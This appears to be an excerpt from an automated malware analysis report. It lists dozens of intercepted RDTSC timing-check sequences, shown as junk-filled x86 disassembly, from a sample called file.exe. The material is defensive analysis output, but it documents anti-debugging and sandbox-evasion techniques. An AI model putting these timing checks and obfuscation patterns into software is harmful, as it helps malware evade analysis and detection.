                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107911F second address: 105D6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, 3F0D5360h 0x00000010 call dword ptr [ebp+12470C42h] 0x00000016 jmp 00007F0640516B49h 0x0000001b je 00007F0640516B5Fh 0x00000021 pushad 0x00000022 jp 00007F0640516B36h 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F0640516B3Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBC7F second address: 10BBCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0640D8206Fh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCAC second address: 10BBCD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640516B3Ah 0x00000012 jno 00007F0640516B36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCD2 second address: 10BBCDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCDD second address: 10BBCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBCE5 second address: 10BBD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBD04 second address: 10BBD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFB4 second address: 10BBFBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFBC second address: 10BBFC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFC1 second address: 10BBFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBFC7 second address: 10BC00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F0640516B36h 0x0000000c jmp 00007F0640516B40h 0x00000011 jmp 00007F0640516B3Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007F0640516B3Ch 0x00000023 push esi 0x00000024 jl 00007F0640516B36h 0x0000002a pop esi 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC18B second address: 10BC1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D8206Eh 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC2DF second address: 10BC306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 jl 00007F0640516B36h 0x0000000e jmp 00007F0640516B47h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC499 second address: 10BC4A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC4A1 second address: 10BC4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC79F second address: 10BC7CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F0640D82066h 0x00000009 jmp 00007F0640D82075h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jp 00007F0640D82066h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C019D second address: 10C01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CE8 second address: 10C2D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82078h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6A5F second address: 10C6A77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0640516B36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F0640516B3Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6A77 second address: 10C6A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA76 second address: 10CBA7C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA7C second address: 10CBA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F0640D82066h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA8D second address: 10CBA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0640516B38h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBBDC second address: 10CBBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBBE2 second address: 10CBC00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640516B48h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBC00 second address: 10CBC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBD6C second address: 10CBD8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F0640516B36h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 jmp 00007F0640516B3Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBEF3 second address: 10CBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0640D82066h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBF00 second address: 10CBF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBF08 second address: 10CBF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0304 second address: 10D030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D030C second address: 10D0321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0640D82066h 0x0000000a jmp 00007F0640D8206Ah 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0321 second address: 10D0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0640516B44h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnp 00007F0640516B36h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0640516B36h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D04E4 second address: 10D04F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F0640D8206Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D04F7 second address: 10D0533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F0640516B44h 0x0000000c jmp 00007F0640516B49h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D06C1 second address: 10D06D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0ACE second address: 10D0B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0640516B3Fh 0x0000000e pushad 0x0000000f jo 00007F0640516B36h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jnl 00007F0640516B36h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0C6C second address: 10D0C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8650 second address: 10D8654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6704 second address: 10D6708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6708 second address: 10D670C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D670C second address: 10D6712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6712 second address: 10D6718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6718 second address: 10D6741 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0640D8206Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82077h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6741 second address: 10D6747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6898 second address: 10D68C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0640D8206Eh 0x00000008 jmp 00007F0640D82075h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A0B second address: 10D6A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A0F second address: 10D6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A17 second address: 10D6A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A1D second address: 10D6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A21 second address: 10D6A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C7A second address: 10D6C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C86 second address: 10D6C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C8A second address: 10D6C90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D728D second address: 10D72EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 js 00007F0640516B36h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 jg 00007F0640516B36h 0x00000018 jnp 00007F0640516B36h 0x0000001e pop edx 0x0000001f popad 0x00000020 pushad 0x00000021 jc 00007F0640516B38h 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F0640516B42h 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push esi 0x00000032 pop esi 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 jc 00007F0640516B36h 0x0000003b popad 0x0000003c jl 00007F0640516B49h 0x00000042 jmp 00007F0640516B3Dh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D75A9 second address: 10D75C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Dh 0x00000007 pushad 0x00000008 jne 00007F0640D82066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80A2 second address: 10D80B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0640516B36h 0x0000000a popad 0x0000000b popad 0x0000000c jl 00007F0640516B56h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80B9 second address: 10D80CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0640D82066h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80CA second address: 10D80CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DDD4D second address: 10DDD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DDD51 second address: 10DDD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F0640516B40h 0x0000000d jc 00007F0640516B36h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F0640516B48h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E05 second address: 10E0E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82077h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E21 second address: 10E0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E27 second address: 10E0E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82071h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E3C second address: 10E0E4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E136F second address: 10E1375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1375 second address: 10E137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E137B second address: 10E137F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E137F second address: 10E1383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1383 second address: 10E138F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E138F second address: 10E1393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1393 second address: 10E1397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1509 second address: 10E150E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E150E second address: 10E1514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1514 second address: 10E1518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1518 second address: 10E152A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E16A2 second address: 10E16A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E193B second address: 10E1965 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0640D82066h 0x00000009 jmp 00007F0640D82077h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jns 00007F0640D82066h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E991C second address: 10E992B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F0640516B36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E992B second address: 10E992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8058 second address: 10E8066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F0640516B36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8066 second address: 10E806F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E806F second address: 10E8075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8186 second address: 10E819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82070h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E819F second address: 10E81A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85AE second address: 10E85BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jns 00007F0640D82066h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85BD second address: 10E85EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640516B44h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85EE second address: 10E85F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85F2 second address: 10E85F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85F8 second address: 10E8614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640D82070h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8FE8 second address: 10E902E instructions: 0x00000000 rdtsc 0x00000002 js 00007F0640516B36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 jmp 00007F0640516B3Ch 0x00000015 jmp 00007F0640516B42h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F0640516B42h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E902E second address: 10E9048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82075h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97AA second address: 10E97AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97AF second address: 10E97B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97B5 second address: 10E97C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97C0 second address: 10E97D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82072h 0x00000009 rdtsc
